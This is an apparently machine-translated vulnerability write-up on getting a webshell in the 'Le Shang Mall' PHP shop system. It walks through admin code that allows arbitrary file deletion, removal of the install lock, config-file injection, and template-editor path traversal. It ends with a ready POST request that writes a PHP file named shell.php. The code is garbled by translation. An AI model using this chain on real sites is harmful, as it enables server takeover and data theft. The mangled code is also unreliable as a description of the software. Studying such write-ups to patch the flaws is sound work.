Le Shang Mall Getshell

Luan After the teacher finished the strike to review a bit

Link: http://pan.baidu.com/s/1qYTsIi4 Password: NNMU

The vulnerability trigger location is

Click Delete

Follow-up function

File Location/admin/controls/backup.class.php

functiondels () {$bu=d ("Backup"); $id=$_post[' ID ']; if(!Count($id)){  $this->error ("Please select Delete Item", 1); }  if($bu->dels ($id)){     $this->success ("Delete succeeded!", 1, "Backup/index"); } Else {     $this->error ("Delete failed!", 1); }
}

Continue to follow the dels function of the backup class

Files in/admin/models/backup.class.php

functionDels$id){    $num=0; $n=Count($id); foreach($id  as $v){$filename=Trim($v);$path=project_path. " backup/".$filename;if(Simfile::d elete ($path)){    $num++;} }    if($n==$num){return true; }    return false;}

Follow-up Delete is not filtered, that is, the ID does not have any filtering, resulting in arbitrary file deletion

     Public Static functionDelete$filename) {        $filename=RTrim($filename, ‘/\\‘); if(Is_dir($filename)) {            if(($DH= @Opendir($filename)) !==false) {                 while(false!== ($file=Readdir($DH))) {                    if($file! = "." &&$file!= "..") {                        $path=$filename. ‘/‘ .$file; Is_dir($path) ? Self::d elete ($path) : @unlink($path); }                }                Closedir($DH); }            return rmdir($filename); } Else {            return unlink($filename); }    }

Remove the installation files leave the lock to reload the CMS

    functionChange_config () {$configArray=Array("HOST" =Trim($_post[' Dbhost ']), "USER" =Trim($_post[' Dbuser ']), "PASS" =Trim($_post[' Dbpass ']), "DBNAME" =Trim($_post[' dbname ']), "tabprefix" =Trim($_post[' Dbpre '])                               ); $filename=".. /config.inc.php "; $configText=file_get_contents($filename); foreach($configArray  as $key=$val) {                $pattern[]= '/define\ (\ "'.$key.‘ \ ", \s*.+\);/'; $repContent[]= ' Define ("'.$key.‘", "‘.$val.‘");‘; }            $configText=Preg_replace($pattern,$repContent,$configText); return file_put_contents($filename,$configText);

Direct write to file without any filtering results in Getshell

There's another one.

I thought that clicking this would have a directory traversal vulnerability

Follow-up function

    functionmod () {$file=Trim($_post[' Name ']); $dir=Trim($_post[' dir ']); $TPL _content=$_post[' Tpl_content ']; $current _dir=Trim($_post[' Current_dir ']); $config=d ("Config"); $config _data=$config-config_list (); if($current _dir= = "TPL"){                $filename=dirname(dirname(__file__))." /.. /.. /"." home/views/".$config _data[0] [' Template ']. /".$dir." /".$file; } Else {                $filename=dirname(dirname(__file__))." /.. /.. /"." home/views/".$config _data[0] [' Template ']. /resource/".$dir." /".$file; }            if(!$handle= @fopen($filename, ' WB ')){                $this->error ("Failed to open the target template file, please check the template directory Permissions", 1); }            if(fwrite($handle,$TPL _content) ===false){                $this->error (' Write target $file failed, please check read and Write permissions ', 1); }            fclose($handle); $this->success ("edited successfully!", 1); }

No extra filtering to write files directly.

Http://127.0.0.1/admin.php/code/mod
POST:
tpl_content=<?php phpinfo ();? >&name=shell.php&dir=index/. /.. /.. /.. /.. /& $current _DIR=TPL

Le Shang Mall Getshell